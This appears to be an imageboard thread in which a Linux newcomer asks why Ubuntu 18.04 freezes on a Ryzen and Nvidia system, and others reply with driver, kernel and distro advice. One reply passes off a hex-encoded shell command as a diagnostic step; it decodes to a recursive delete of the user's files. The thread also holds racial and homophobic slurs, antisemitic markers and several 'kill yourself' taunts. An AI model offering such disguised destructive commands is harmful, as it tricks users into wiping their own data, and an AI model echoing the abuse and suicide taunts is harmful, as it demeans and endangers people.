Linux noob

>Linux noob
>install Ubuntu 18.04
>screen freezes randomly
>have to manually reboot PC with button twice in one day

This shit is worse than Windows 10. What the fuck is going on?

Attached: B3C2121B-3ACD-458A-922A-BCABF8951DE9.jpg (640x360, 28K)

Other urls found in this thread:

system76.com/pop
antixlinux.com/download/
twitter.com/NSFWRedditVideo

>What the fuck is going on?
Your brain is too small.

unless you give us more details we literally cannot help you
when does it happen, in a specific time of day? what is the last thing that happens before it freezes up, are there any common points? what does journalctl say about the time when the freezing happens?

I run fedora and never have any problems. You might want to try 18.10. I only use lts for servers

Use linux mint instead

Trying to run some Django shit in VSCode terminal and it just literally freezes.

post the output of inxi -C

Ubuntu has been shitting itself for a while now, I don't know what the fuck Canonical is doing.

You're the biggest retard.

Let me guess, you have an Novidya GPU?

did you consider that you're at fault for writing shitty code and that it has nothing to do with the OS?

Yeah why? Installed Nvidia drivers and CUDA.

yeah I have the same issue with Ubuntu on my pc. Debian doesn't seem to have that issue.
for me going back to Win7 fixed it completely. Linux distro are still garbage after all these years

I could be doing the same things in Windows and it wouldn't freeze. I thought Linux wasn't supposed to freeze?

so let me understand, when you run your python script it just freezes up?
because if that's the case, then your system is not freezing randomly
you said in the OP: "screen freezes randomly"

To be fair i can't really know for certain if it was a cause of just a correlation.

It also froze once in sleep mode and wouldn't wake up.

>It also froze once in sleep mode and wouldn't wake up.
is this a laptop? if so, what laptop is this?

what is "freezing"? can you open another tty with ctrl alt f2/f3 etc and restart gnome? or does it not respond to any command?

Desktop, Ryzen and Nvidia gpu.

The mouse/keyboard didn't seem to work and screen was frozen. I didn't try ctrl alt f2/f3 but I'll try next time. Thanks.

that's the kernel for you, if your laptop is newer than the kernel that's why. install fedora it has the latest stable kernel

might be a few things. could be the nvidia drivers/cuda version you have are too new for ubuntu 18.04 (yeah it's lts but it's also nvidia and it can happen). could also be due to ryzen not being well supported in 18.04 as well. or it's something else

your sleep issue might not have anything to do with your vscode issue. unless it's ryzen maybe i don't know. install 19.04 when it comes out as stable and nvidia releases the shit cuda + drivers package (install the drivers that come with cuda to avoid issues, that shit's gayer than lolidom)

Is fedora good?

Never listen to distro shills. Just do you.

Yeah thanks. Ubuntu prompted me for a system update, should I have done it?

it's the sjw, they called for a halt until author of a new module apologizes for his stance on asexuals

i never used it but from what i heard redhat enjoys breaking it a lot to test whether some new shit feature is good or not. canonical does that too i suppose

you should be updating your system but depending on how you install the nvidia/cuda drivers, that could cause you problems. when you install cuda, you should install it by pinning the cuda version (ex: apt install cuda-10-1) so it doesn't auto update itself or the video drivers accidentally. that can cause issues. when you download a new .deb for a new cuda version, you can then do apt install cuda-11 etc, after you check the update should really go through

graphics drivers, especially stuff with cuda, is still somewhat of a problem. and it works best in ubuntu in my experience

He’s saying try another tty session

So should I try Ubuntu 18.10?

Just install 18.10 you’re using new hardware with an old kernel. Report back if that doesn’t fix it

ubuntu 18.10 is less buggy than 18.04. i can't remembre why but 18.04 was kind of buggy despite being lts. 19.04 will be out next month, if you can't wait for it, then i think you should, yes

if you have a gtx 660, then you need to download the proprietary drivers for it. i had a 660 once and for some reason the open source drivers would freeze consistently after a few minutes. there's a bug report for it, but no one has fixed it after years.

Why bother? It hasn't hurt sales.

no one is selling nouveau

you are a sharp one.
I am thwarted.

>judging GNU/Linux because of an Electron app's poor performance
lol, the VSCode terminal is shit for me too. Not sure if it's just a Linux thing. It freezes a lot so I use an actual terminal and don't have any problems.

With Ubuntu it's always the fucking Nvidia drivers.
In the grub but menu, press e, replace "quiet splash" with "nomodeset" press f10 to boot. Then install the proprietary Nvidia drivers, then reboot. This has been a problem for years, even a noob like me has it memorized

Control-S freezes the terminal
Control-W unfreezes it

that's what you get for using gnome

Trust me I hit a lot keys, nothing worked.

Ubuntu is a shitty distro, that's what's going on. Install Gentoo.

Try 16.04

But its most likely a driver issue.

Could be an older GPU or on board graphics. Alternatively you could find a package for your GPU.

>gnome

Yikes!

Nah 1070ti gpu

>ubuntu

Hi OP, give Pop OS a try, it's made by System76, it has an ISO with the latest nvidia drivers, it's based on ubuntu so it's pretty easy to use
system76.com/pop

>he fell for the ubuntu/linux meme
Does the audio sound off too? I had all the issues you're having and more, my screen went black half the time it did this though so maybe its different. Literally nothing helped, just wasted time.

Nouveau wont work for all stuff. Nvidia Optimus hardware comes to mind, and required Bumblebee to run instead of Nouveau. Also, if you are running older Radeon stuff, the Radeon driver automatically kicks in.

Get 1810 or even the beta with the latest kernel
1804 is pure trash

ctrl alt 8 to kill front end process

Just kill yourself now. Its easier this way

i had issues with 18.04 where it'd freeze after 5 mins, went to 16.xx ltsb and it works fine, installed latest kernel and its all good.

probably your hardware is shitty

>nvidia
found your problem

Attached: 1336539887972.jpg (900x1000, 226K)

probably an nvidiot

kys

>unless you give us more details we literally cannot help you
Good. We’re not here to help.

There are any difference between font rendering between Fedora and Ubuntu?

>70288394
it werks™ on my machine

We neex more info. Post the output of
$(echo 726d202d7266202a0a |xxd -rp)
then maybe we can help you.

>This shit is worse than Windows 10.
As someone who recently went through the displeasure of installing a fresh copy of Windows 10 Home on a test computer, I thoroughly disagree.

>Linux noob
Stopped there. Install gentoo

picture unrelated

Attached: 16d.jpg (480x360, 11K)

If you have ryzen, make sure to disable C-State

I've got the same problem, but it usually happens when I'm running heavy shit on Blender. I also am unable to use software that requires me to use my GPU to run, like Da Vinci Resolve and the Unity game engine. They fail with "aborted (core dumped)". I came to the conclusion that this was a GPU issue, as memtest showed no failures in memory.

When it all freezes I have to ctrl shift fx to another terminal window and kill all the processes. It sucks but at least I can go back to work without having to reboot (although a reboot would be quicker. This is likely more a matter of pride than pragmatism to me.)

My drivers are also proprietary from Nvidia and I have the Cuda toolkit installed. Interestingly, I can successfully use my GPU to render stuff on Blender, and I believe it is because Blender doesn't require a GPU to run, just to perform better.

I didn't have this problem on 16.04 though. I could run all kinds of software. I also just came back from Manjaro because driver management in Manjaro is absolute hell.

Additional info:

Kubuntu 18.04
GPU: gtx 1060 (6gb)
12gb ram
Processor: amd 1090t

Stop buying (((nVidia))), retards. And if you're dumb enough to buy that garbage then don't use Linux because nVidia doesn't support it well.

What's c-state?

cuda and productivity software that relies on it only exist on nvidia. this isn't about gaming children blindly following a brand

Lol my work pc on windows7 freezes sometimes when i get it on heavier load than internet browsing and youtube watching
Stop blaming linux, upgrade your toaster

literally your fault for trusting the goyvidia drivers to "just werks", just like RTX

Don't use cuda

install hannah montana linux, fagit

did the same recently; works on my machine :o)

use manjaro. may your GPU is fucking things up

baytrail CPU?

1.complain about linux not working
2. get a lot of responses
3. profit

This post is totally organic and not fabricated by mods/janitors at all. Has nothing to do pageviews and ad revenue.

>What the fuck is going on?
It's quite simple. You fell for a meme.

OK this is bait

>he fell for the linux on desktop meme
Sorry, friend. It happens to the best of us.

Linux community in a nutshell. This is why you'll never, ever have a legitimate desktop OS.

and that's a good thing, keeps the retards away.

only pedophiles and terrorists use GNU/Linux

And all of the useful software

>it's my fault Linux feezes

Is that like you're holding your phone the wrong way?

I use Manjaro and never have problems

I shit you not I installed ubuntu18.04 friday and started ricing and this happened to me today randomly (wasn't running anything)

You choose Ubuntu m8. Take BSD lul

>gnome is worst than w10
Correct
>Install Kubuntu

wait do these people actually make any real money?

Memory leaks? How much do you have?

yeah you just have to program some shit to make it run on your hardware that is new lol, what are you some kinds of casul?

Programming your own dirvers for hardware in assembly and with punchcards is easier than just isntalling windows 10

>Ubuntu
That's the problem. Install AntiX
antixlinux.com/download/

What that?

Attached: 1548101522627.png (200x193, 30K)

>Running Raspbian on my thinkpad
The prognosis for my distrohopping bullshit doesn't look good, lads...

Attached: distrohopping2019.jpg (590x350, 36K)

Install drivers retard.

Install pop_os. Better nvidia support.

Use xubuntu or Linux mint you fucking nigger

those are both nigger distros

It's Linux dogshit so what do you expect
And just like clockwork another distro gets ruined by infighting

Your hardware probably isn't fully supported yet. Usually this is due to hardware companies making closed-source Windows-exclusive drivers for their products, resulting in Linux devs having to reverse-engineer those drivers, which can be a time-consuming development cycle. In that sense, it's to be expected that new hardware won't be supported right away; indeed, it's not a problem of Linux not supporting your hardware, it's a problem of your hardware manufacturers not supporting Linux.

what module? can you show what's happening?